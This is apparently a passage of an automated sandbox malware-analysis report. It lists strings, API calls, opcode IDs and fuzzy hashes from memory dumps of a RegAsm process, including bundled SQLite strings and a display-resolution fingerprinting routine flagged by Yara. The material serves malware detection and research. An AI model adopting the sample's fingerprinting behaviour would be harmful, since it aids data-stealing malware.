                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4C6F60
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$bad parameter or other API misuse$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$out of memory
                                                                                                                                                                                                • API String ID: 0-2911740470
                                                                                                                                                                                                • Opcode ID: 5cc9b3d774d5523220719ee6c4dd054d42050a1a8f7379c724c1bf2c91ba6578
                                                                                                                                                                                                • Instruction ID: 53351d49602f36ac12e5e12451efbc8c60db41240cb94c6c16295dfd11e46afb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cc9b3d774d5523220719ee6c4dd054d42050a1a8f7379c724c1bf2c91ba6578
                                                                                                                                                                                                • Instruction Fuzzy Hash: 832149BDA0435097DB254B24EC41BD727A36BD4B19F28C52DF4D657301D635F8878392
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b54a5ea55491ca75d754ca7ae4acb4d7df21aefe6965cbd11c614bf193b88763
                                                                                                                                                                                                • Instruction ID: 025a955a8dc3b967cf3a403ecb4249875e92c1a10da4a8f9be991510a7ebe4bc
                                                                                                                                                                                                • Opcode Fuzzy Hash: b54a5ea55491ca75d754ca7ae4acb4d7df21aefe6965cbd11c614bf193b88763
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C4191705006219FDB246F25ECC9B4677BDBFA4269F10482CFCC692611D731F498CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                                                                                                                                                                • Instruction ID: a754f903f330e8cdaa808d6a3848bf6dda433f6ef70fdc4e692f9babce47c66e
                                                                                                                                                                                                • Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B2191AAD0065276FB02BF216C02FEF729C5F95256F05885CFD65A2242F738E64543B3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: fts5$fts5_source_id$fts5vocab$porter$snippet$unable to delete/modify user-function due to active statements$unicode61
                                                                                                                                                                                                • API String ID: 0-2986783930
                                                                                                                                                                                                • Opcode ID: 7540d568461e11ad9623dc0c9e0d620a285d1e086c66ba00c519816b3460ab24
                                                                                                                                                                                                • Instruction ID: ae49f42ecaaf310123f85fa146ab3196a11e15eedf27a9bfa7ddc5659d631eb9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7540d568461e11ad9623dc0c9e0d620a285d1e086c66ba00c519816b3460ab24
                                                                                                                                                                                                • Instruction Fuzzy Hash: 58F1E3B4A05301DBF7049F26DC85B8B7BE9BF90384F40456CE88A97281E775E558CBE2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5AFBA0
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B5AFB7A
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5AFBA5
                                                                                                                                                                                                • API called with NULL prepared statement, xrefs: 1B5AFB65
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5AFB96
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 8552df9e4f768bc4d8598d0c1edfcb3f1e2ee19b9df76714dc9393bcb841ab76
                                                                                                                                                                                                • Instruction ID: f4d0fc1b259d0cc38eeadb8bec9971ff55b8e20cb6f15744a7a74852da40fea4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8552df9e4f768bc4d8598d0c1edfcb3f1e2ee19b9df76714dc9393bcb841ab76
                                                                                                                                                                                                • Instruction Fuzzy Hash: D9B1F4B49043419FF720AF35D845B9BB7E4BF44718F04492CE88AE7281E776E449C7A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
                                                                                                                                                                                                • API String ID: 0-3324442540
                                                                                                                                                                                                • Opcode ID: a82e5fdea01da0b329044763abde7cf27f6f211008d8ec5e4da6d02d58c11948
                                                                                                                                                                                                • Instruction ID: 154a43d0e366548598ef5846087b762aa173dddde3387ee501f069de07f89800
                                                                                                                                                                                                • Opcode Fuzzy Hash: a82e5fdea01da0b329044763abde7cf27f6f211008d8ec5e4da6d02d58c11948
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A81F076A01211EFEB018F64DC85B8BB7E8FF94265F040669FC84E7250D732E954CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4EE380
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B4EE36A
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4EE385
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4EE376
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3620335220
                                                                                                                                                                                                • Opcode ID: faf7aa9fe5189341562b881b5a826fec9e446e82bdd0ace813933b9003202f24
                                                                                                                                                                                                • Instruction ID: 4dafa5f31757a5278447ff31cc1aaba0a9665b22c1032a0bf5944571943aeb54
                                                                                                                                                                                                • Opcode Fuzzy Hash: faf7aa9fe5189341562b881b5a826fec9e446e82bdd0ace813933b9003202f24
                                                                                                                                                                                                • Instruction Fuzzy Hash: E051B571D00221DBEB658F64DC8DBDA3768AFA4316F04C42CED8996341D739E588CBB2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5974D7
                                                                                                                                                                                                • invalid, xrefs: 1B5974BC
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B5974C1
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5974DC
                                                                                                                                                                                                • unable to close due to unfinalized statements or unfinished backups, xrefs: 1B5975D1
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5974CD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                • API String ID: 0-3800776574
                                                                                                                                                                                                • Opcode ID: c3aaedfd4f9b1d1ba8ffa6f16768def9d9983f0a4263c6982f5f15076eaf67b0
                                                                                                                                                                                                • Instruction ID: 745a3c76535adb5c6e6fc68e6b9a0446e324d6b07d9f13e7e4a8b56027371246
                                                                                                                                                                                                • Opcode Fuzzy Hash: c3aaedfd4f9b1d1ba8ffa6f16768def9d9983f0a4263c6982f5f15076eaf67b0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 84514775A00711ABF7119F38FC89BDB77A9AF90214F05442EE8EA93201E730F545C7A6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1B53BD67
                                                                                                                                                                                                • PRAGMA %Q.page_size, xrefs: 1B53BD03
                                                                                                                                                                                                • undersize RTree blobs in "%q_node", xrefs: 1B53BDA1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
                                                                                                                                                                                                • API String ID: 0-3485589083
                                                                                                                                                                                                • Opcode ID: 7963bdda837c4ce5170bd92aa0cc645d6e1855e17d058aacf264ad953bbb41a8
                                                                                                                                                                                                • Instruction ID: 000b32e08c196d49fa3381a18d92f41cff572c7162dcbcd192cbed960ac4b97a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7963bdda837c4ce5170bd92aa0cc645d6e1855e17d058aacf264ad953bbb41a8
                                                                                                                                                                                                • Instruction Fuzzy Hash: F431B4B1A00211ABF7048F65DC84BDA7BBCEB98356F004A29FC85D6321D735E958DBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0040F402
                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040F40D
                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040F418
                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0040F423
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00413CF0,?,00000000,?,Display Resolution: ,00000000,?,004255B0,00000000,?), ref: 0040F42F
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00413CF0,?,00000000,?,Display Resolution: ,00000000,?,004255B0,00000000,?,00000000), ref: 0040F436
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040F448
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                • String ID: %dx%d
                                                                                                                                                                                                • API String ID: 3940144428-2206825331
                                                                                                                                                                                                • Opcode ID: 5c19b7d1c26090864035b4511e7466069b565c9ce0d08ad1df0c07519e683e3f
                                                                                                                                                                                                • Instruction ID: e0aa5cb377fd9a4d6f668c4785e13fa4c5f16bf34494e881d495f65158ee2036
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c19b7d1c26090864035b4511e7466069b565c9ce0d08ad1df0c07519e683e3f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 69F0D135A01224FBE7106BA6AC0DE9F7E6DFF4BBA1F001015FA01A3150D6754A018BB4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: f806a499c84659f80691f49cd4cda1903242f0ee33ee49ed6d3ff8e1644f3a0d
                                                                                                                                                                                                • Instruction ID: b9073483952595b6969f98a04f276e677707d37e99ebd57ac0d3ed86fa9e9c01
                                                                                                                                                                                                • Opcode Fuzzy Hash: f806a499c84659f80691f49cd4cda1903242f0ee33ee49ed6d3ff8e1644f3a0d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F12271A04651DFE700DF28D8C4AE6BBF0FF94215F4456A9E888CB252E331E95AC7A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • malformed inverted index for FTS5 table %s.%s, xrefs: 1B4C2A8A
                                                                                                                                                                                                • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1B4C29F1
                                                                                                                                                                                                • unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 1B4C2AA0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
                                                                                                                                                                                                • API String ID: 0-3572959941
                                                                                                                                                                                                • Opcode ID: a58b9ef65bdd4dee89e28b3c85a24f7b663237a4ba77b229b7ef541b9a241c18
                                                                                                                                                                                                • Instruction ID: 486b4dcf584dd4a957c3933d584160f0cf1e1c4bbb9d0d372beaa4497cae0545
                                                                                                                                                                                                • Opcode Fuzzy Hash: a58b9ef65bdd4dee89e28b3c85a24f7b663237a4ba77b229b7ef541b9a241c18
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7241E376901221ABD3148F69DC88EDB7BACFF94665F04452DFC8D82200D732D699CBE2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (FK)
                                                                                                                                                                                                • API String ID: 0-1642768157
                                                                                                                                                                                                • Opcode ID: 0814285b6810c0ebd20f4e43fc2232166b8e8006f657536689d7e9cf560282dc
                                                                                                                                                                                                • Instruction ID: 7c6d62fa4e290ebdc907c34b889d516732975a2b9b4e0ee6517f081c207c5e8b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0814285b6810c0ebd20f4e43fc2232166b8e8006f657536689d7e9cf560282dc
                                                                                                                                                                                                • Instruction Fuzzy Hash: F281D77F7052009FEB009F29EC80B96F7A1FB84335F24866EE586976A1E732E511DB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                                • API String ID: 0-2815843928
                                                                                                                                                                                                • Opcode ID: 03cbb361dd652c68e623911a9c663b6eb8e515f5004563a97a30cbfa916c5ab1
                                                                                                                                                                                                • Instruction ID: 34baf2fa92d393f7342cbc73b39f95de2fbfe01dff796cecdc8bed2780ce5d9f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 03cbb361dd652c68e623911a9c663b6eb8e515f5004563a97a30cbfa916c5ab1
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA91FDB0900311ABEB049F64CC88B9777ACBFA0355F44066DFCC997241E735E958CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B4BECD5
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4BECDA
                                                                                                                                                                                                • %.*s%s, xrefs: 1B4BEC88
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4BECCB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-894757972
                                                                                                                                                                                                • Opcode ID: 99777d64409a22d8854572072791254972214cb28cdf0e36cc2433c65ca66de3
                                                                                                                                                                                                • Instruction ID: a49efca2b14589892db43a56ca7a7ba4252e460cebd1fff268c0c29263478e58
                                                                                                                                                                                                • Opcode Fuzzy Hash: 99777d64409a22d8854572072791254972214cb28cdf0e36cc2433c65ca66de3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F61E375A443418BDB24CF14CA81AEBB7F1AFC8714F048D6CE9899B341D735E945CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: [%!g,%!g],$[%!g,%!g]]
                                                                                                                                                                                                • API String ID: 0-3388633204
                                                                                                                                                                                                • Opcode ID: 4011be12b25922a1a4e21b3965c9d44b0681f62f27b98117cac249d1591be248
                                                                                                                                                                                                • Instruction ID: af5b3ce9ac5d4c8047234bb33003af26e3f0604e43694255a5edd77b0d3fcc0b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4011be12b25922a1a4e21b3965c9d44b0681f62f27b98117cac249d1591be248
                                                                                                                                                                                                • Instruction Fuzzy Hash: D25128749007069BDB10DF69ECC4B97BBB4AF9A310F00861DFC8996241E775E489CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1B4BF418
                                                                                                                                                                                                • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1B4BF33F
                                                                                                                                                                                                • malformed inverted index for FTS%d table %s.%s, xrefs: 1B4BF3F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
                                                                                                                                                                                                • API String ID: 0-2809892521
                                                                                                                                                                                                • Opcode ID: ee5c5272594c287bc3584bd0bdeb93b02ed8a7b01c83ef9510aac51e96d7cbf2
                                                                                                                                                                                                • Instruction ID: be7d22d1c77e28fe898419bd949cb6a2578571de44d0a00e3437540120dee53a
                                                                                                                                                                                                • Opcode Fuzzy Hash: ee5c5272594c287bc3584bd0bdeb93b02ed8a7b01c83ef9510aac51e96d7cbf2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6941C4719012219BD718AF65EC88BDB3B6CEFA4265F04882DFD89C2241D731D55DCBB2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4C6E62
                                                                                                                                                                                                • invalid, xrefs: 1B4C6E47
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B4C6E4C
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4C6E67
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4C6E58
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
                                                                                                                                                                                                • API String ID: 0-3670841456
                                                                                                                                                                                                • Opcode ID: 1ae217adf6e2fbb2f759bd11c70840521828c86f3b499255bd0735594ce934e3
                                                                                                                                                                                                • Instruction ID: ed283b2a72ec2de38416cd6071c531fc4223db368e81d6326a9326863f8db62a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ae217adf6e2fbb2f759bd11c70840521828c86f3b499255bd0735594ce934e3
                                                                                                                                                                                                • Instruction Fuzzy Hash: FDF02768A00144BAEF145218CD42BEA3B221B68B06F80C14EF1951F286C32664438350
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4C6EE5
                                                                                                                                                                                                • invalid, xrefs: 1B4C6ECA
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B4C6ECF
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4C6EEA
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4C6EDB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
                                                                                                                                                                                                • API String ID: 0-3670841456
                                                                                                                                                                                                • Opcode ID: 589ca54cdb5fca9a3cb4703c4efc30dca79f4af0e461bd3b5bd8f1d38e613083
                                                                                                                                                                                                • Instruction ID: 0ec5623132c005a5d0e2eb1d3fc05155505aecd118ee9ed1288a8c730fa9f49e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 589ca54cdb5fca9a3cb4703c4efc30dca79f4af0e461bd3b5bd8f1d38e613083
                                                                                                                                                                                                • Instruction Fuzzy Hash: 49F0E578B04584BFEF204210DD62FE72B961794B03F80C1AAF2915F2E2E724A4404311
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

